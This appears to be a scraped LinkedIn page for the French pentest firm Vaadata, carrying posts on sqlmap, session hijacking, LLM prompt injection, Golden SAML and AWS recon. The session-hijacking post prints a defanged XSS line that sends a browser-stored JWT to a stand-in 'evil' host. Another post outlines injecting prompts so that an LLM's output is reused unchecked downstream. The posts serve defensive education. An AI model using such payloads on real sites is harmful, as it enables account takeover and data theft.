Un nouvel arrivant dans l’équipe pentest 👋 Thomas rejoint Vaadata en tant que Pentester. Diplômé de CPE Lyon, il intervient sur des sujets de pentest web, mobile et d’audit de code. Avant ça, il a notamment évolué comme auditeur sécurité aux Aéroports de Lyon en freelance, après deux ans d’alternance dans le domaine. ✈️ Un profil technique, déjà bien confronté au terrain, qu’on est ravis d’accueillir dans l’équipe pour venir soutenir notre activité ! Bienvenue Thomas ! #ethicalhacking #securiteinformatique #pentest
VAADATA
IT Services and IT Consulting
Lyon, Auvergne-Rhône-Alpes 2,302 followers
Your expert partner in offensive security : Pentest, Red Team & Assumed Breach.
About us
We support organisations of all sizes and across all sectors with : - penetration testing on all types of targets (web and mobile apps, infrastructure, networks, cloud, IoT, etc.) - social engineering campaigns (phishing, vishing, smishing, etc.) - Red Team audits - Assumed Breach exercises The goal ? To identify security vulnerabilities in your critical assets using an offensive approach and provide you with concrete recommendations to strengthen your defences. PASSI, CREST and ISO 27001/27701 certified, we offer security audits that comply with industry best practices and the most stringent security standards, ensuring optimal protection of our clients information and data. Our auditors hold certifications (OSCP, OSWE, CRTP, CRTE, RTO, etc.) that demonstrate our in-depth understanding of a wide range of technical cybersecurity challenges and our ability to address them effectively. Contact us to discuss our approach and your cyber challenges!
- Website
-
https://www.vaadata.com
External link for VAADATA
- Industry
- IT Services and IT Consulting
- Company size
- 11-50 employees
- Headquarters
- Lyon, Auvergne-Rhône-Alpes
- Type
- Privately Held
- Founded
- 2013
- Specialties
- Ethical Hacking, Pentesting, Pentest, Software Security, Security Training, Web Security, Mobile Security, and IoT Security
Locations
-
Primary
Get directions
33, Quai Arloing
Lyon, Auvergne-Rhône-Alpes 69009, FR
Employees at VAADATA
Updates
-
Identifier une SQLi, c’est le début. L’enjeu, c’est de savoir ce qu’on peut en extraire. C’est là que sqlmap devient intéressant❗ En mission, nos pentesters l’utilisent surtout pour passer d’un point d’injection à une compromission, sans passer par une exploitation entièrement manuelle. Si on veut tirer parti d’une SQLi time-based sur un paramètre à la main il faut, confirmer, adapter les payloads au système de gestion de base de données puis exfiltrer caractère par caractère. Une fois le paramètre vulnérable identifié, on peut fournir la requête HTTP et le point d’injection à sqlmap. L’outil va : - Tenter de détecter l'injection SQL en testant un grand nombre de payloads - Identifier le type de SQLi et le système de gestion de base de données - Adapter automatiquement les payloads selon le type de la SQLi et le système de gestion de base de données - Énumérer les bases de données, tables et colonnes - Extraire les données L’utilisation de l’outil présente un gain significatif. Là où un test manuel devient vite impraticable, sqlmap industrialise l’exploitation, évitant à son utilisateur d’écrire le script et de faire l’exploitation manuellement. Utilisé avec un proxy comme Burp, il permet de garder de la visibilité sur ce qui est envoyé et reçu. Ce n’est pas un scanner magique. Utilisé brut, il génère du trafic inutile et peut se faire bloquer. Mais bien utilisé, c’est un accélérateur pour exploiter et valider l’impact d’une SQLi 🏃 Des exemples concrets sont disponibles dans l’article en commentaire 👇 On reviendra plus tard sur les usages avancés dans un prochain post. Que vous soyez côté pentest, dev ou AppSec, c’est un outil qui vaut le détour ! #ethicalhacking #cybersecurity #sqlmap #SQLi
-
-
Il y a un mois, nous vous annoncions la nouvelle. Vaadata est officiellement qualifiée PASSI. Et finalement, nous ne nous sommes pas arrêtés sur ce que cela signifie concrètement. Choisir un prestataire PASSI, ce n’est pas choisir une qualification de plus dans un tableau déjà bien rempli. C’est faire le choix d’un acteur dont les méthodes, l’organisation, les compétences et le niveau d’exigence ont été évalués dans un cadre défini par l’ANSSI. Autrement dit : vous ne vous basez pas uniquement sur un discours commercial ou une réputation. 👉🏻 Vous vous appuyez sur un cadre de confiance reconnu. Comme le rappelle l’ANSSI - Agence nationale de la sécurité des systèmes d'information à propos de la qualification : “Attestant de leur conformité aux exigences réglementaires, techniques et de sécurité promues par l’ANSSI, la qualification est la recommandation par l’État français de produits ou services de cybersécurité éprouvés et approuvés par l’ANSSI. La qualification atteste de la robustesse du produit ou de la compétence du prestataire de services et garantit l’engagement du fournisseur de produits ou services au respect de critères de confiance.” C’est particulièrement important quand on parle de pentest. Parce qu’au-delà du livrable, un audit de sécurité sert à éclairer des décisions, à prioriser vos actions, à comprendre votre niveau d’exposition. Vous vous posez des questions sur ce que change concrètement un prestataire PASSI pour votre futur audit ? Envoyez-nous un petit message, on est aussi là pour vous conseiller avec transparence 💌 #PASSI #ethicalhacking #pentest
-
-
Attackers don’t (always) need your password! They just need your session (cookie, bearer token, JWT etc…). To achieve this, several common attack vectors can be used: ♦️ XSS: Injecting malicious JavaScript to steal a cookie or a token stored in the browser. For example: fetch("https[:]//evil[.]site?data="+localStorage.getItem('JWT')) retrieves a client-side JWT and allows session hijacking. ♦️ Session fixation: If the session ID is not regenerated upon authentication, an attacker can wait for a user session to be bound to it and then reuse it. ♦️ Unencrypted network traffic: Without TLS, any session ID transmitted over internal or public networks can be intercepted, even if the password is secure or MFA is enabled. ♦️ AiTM phishing (Adversary-in-the-Middle): A malicious proxy positioned between the victim and the legitimate platform captures the authenticated session after a successful phishing attack (even with MFA active). ♦️ Malware: Certain types of malwares (known as infostealers) are specifically designed to extract credentials and session data from infected machines and exfiltrate them to attacker-controlled servers. A compromised session ID can be enough to take over an account, regardless of the password or MFA, and allows attackers to perform any actions permitted by the hijacked session. Strong passwords and MFA alone are not enough. Effective protection relies on a combination of: - Random, unique session IDs, regenerated after authentication - Secure cookies (HttpOnly, Secure, SameSite) - Systematic use of TLS encryption - Strong vigilance against XSS vulnerabilities and insecure token storage - Strict control over session lifetime and network access 📰 In our article, we break down the most common exploitation scenarios with practical examples: https://hubs.ly/Q049-trz0 #ethicalhacking #cybersecurity #SessionHijacking
-
-
Un LLM branché sur votre SI peut faire ressortir des failles qu’on ne voyait pas avant. Prompt injection, absence de filtrage en sortie, accès trop large aux données ou aux APIs… Ce ne sont pas des failles rares mais le risque apparait quand une sortie du modèle est traitée comme une donnée fiable. Lors des tests, on joue surtout sur les entrées utilisateur. 🎯 Objectif : influencer la première réponse du modèle, puis la faire réutiliser plus loin dans le traitement. Si cette réponse est reprise sans contrôle, elle peut devenir un vecteur d’injection classique. Le point clé reste toujours le même. Le modèle n’est pas le problème, c’est ce qu’on lui donne et ce qu’on fait de ses réponses. Entrées, sorties, droits, enchaînements, tout doit être pensé comme une surface d’attaque. Si vous travaillez avec des LLM, ce carrousel donne une idée des points à surveiller 👇👇 #IA #ethicalhacking #pentest #LLM
-
Au départ, c’était une journée dédiée à nos clients pour parler technique. En réalité, c’était bien plus que ça. On a passé la journée avec une trentaine de nos clients. Pas de présentations commerciales. Uniquement du concret. Seulement du terrain. Pour monter en compétences. Et beaucoup d’échanges. Ce qui revient le plus souvent : - des doutes sur le cadrage de ses audits - des difficultés à prioriser la remédiation - et un vrai besoin de comprendre ce qui se passe du point de vue de l’attaquant Mais surtout, des gens qui ont envie de se retrouver. Pour de vrai. De discuter des vrais sujets. De poser des questions sans filtre. De comparer ce qu’on vit chacun de son côté. Parce que la cybersécurité, c’est de l’humain avant tout et on a tendance à facilement l’oublier derrière nos écrans isolés. C’est exactement pour ça qu’on a créé ce club clients. Un espace privilégié où l’on peut parler ouvertement : ce qui marche, ce qui bloque, ce qu’on devrait essayer et surtout, ce qu’il s’est réellement passé. Merci à tous ceux qui étaient présents 💌 On continuera à partager ici ce qu’on observe en mission. #cybersecurity #ethicalhacking #securiteinformatique #pentest
-
-
-
-
-
+1
-
-
VAADATA reposted this
Encore une forte affluence au Forum INCYBER (FIC) cette année ! Heureux d’avoir pu recroiser partenaires et clients. Et de potentiels futurs j’espère !
-
-
L'attaque Golden SAML est un risque à ne pas sous-estimer pour votre SI ! Elle survient lorsqu'un attaquant dérobe la clé privée de signature de votre fournisseur d'identité (IdP), comme AD FS. Avec ce secret, il peut forger des assertions de toutes pièces, usurper n'importe quel compte, contourner la MFA et maintenir une persistance totale et invisible. 💡 Bonnes pratiques pour sécuriser vos flux SAML : 1. Utiliser un HSM (Hardware Security Module) : c'est la mesure la plus robuste pour générer et stocker vos clés de signature, car elle garantit physiquement que la clé privée ne peut jamais être extraite du serveur. 2. Durcir le serveur IdP : traitez vos serveurs de fédération avec le même niveau de criticité que vos contrôleurs de domaine (isolation VLAN, accès restreints, authentification forte pour les admins). 3. Automatiser la rotation des clés : implémentez le renouvellement périodique (auto-rollover) de vos certificats de signature pour limiter la durée d'exploitation en cas de compromission. 4. Corréler les logs : pour détecter les authentifications fantômes, comparez systématiquement les logs de connexion du Service Provider avec les événements d'émission de jetons de l'IdP. 5. Surveillance active : supervisez les accès inhabituels à la clé de signature et les exports de certificats (IDs d'événements Windows 1007 et 4662). La sécurité SAML ne repose pas sur la confiance, mais sur l'inviolabilité absolue de votre secret de signature. L'infographie ci-dessous vous montre comment marche l’attaque 👇 #cybersécurité #securiteinformatique #cyber #SAML
-
-
AWS security is often fought on multiple fronts. A chain of small misconfigurations can be enough to move quickly through an environment. ⚡ A leaked API key found in a repository or an S3 bucket remains one of the most common entry points. Tools like amass, subfinder or nmap help identify subdomains and exposed services, while CloudMapper makes it easier to visualize public-facing misconfigurations. Even with limited permissions, IAM enumeration (using `aws iam list-roles` ) often reveals more permissive roles. And a seemingly harmless permission like `rds:DescribeDBInstances` can disclose critical information about your databases. With the right permissions, an attacker can gather sensitive details about RDS instances. If security groups are overly permissive or network isolation is weak, they may be able to connect directly to the databases and access sensitive data. Our article walks through this offensive methodology step by step: - reconnaissance, - bucket enumeration, - IAM enumeration, - database access - concrete remediation measures It outlines the attack methodology and the key areas to monitor to strengthen your security posture. If your IAM roles, S3 buckets and RDS instances have never been thoroughly audited, chances are this read will be valuable. 👇 Article in the comments #cybersecurity #AWS #ethicalhacking #pentest
-
-
Dans moins d'une semaine, direction le Forum INCYBER (FIC) 📣 C'est le grand rendez-vous annuel de la cybersécurité en Europe. Et ça se passe à Lille. Mais jusque là, on ne vous apprend rien. Le truc cool à noter c'est que vous pourrez retrouver notre CSO Julien B. sur place. Et pourquoi c'est cool ? 1) Julien est vraiment sympa (bon point, en vrai) 2) Il peut vous parler terrain : pentests, red team, assumed breach, et vous aider à cadrer le bon format selon votre contexte, autour d’un café. Si vous êtes RSSI / CTO / CEO et que vous cherchez un prestataire de pentest, on peut en parler au FIC : - pentest appli web / mobile / infra / AD - red team, assumed breach - restitution orientée risques + priorisation claire des correctifs Vous y serez aussi ? Écrivez à Julien pour caler un créneau. #ethicalhacking #securiteinformatique #pentest #cybersecurity
-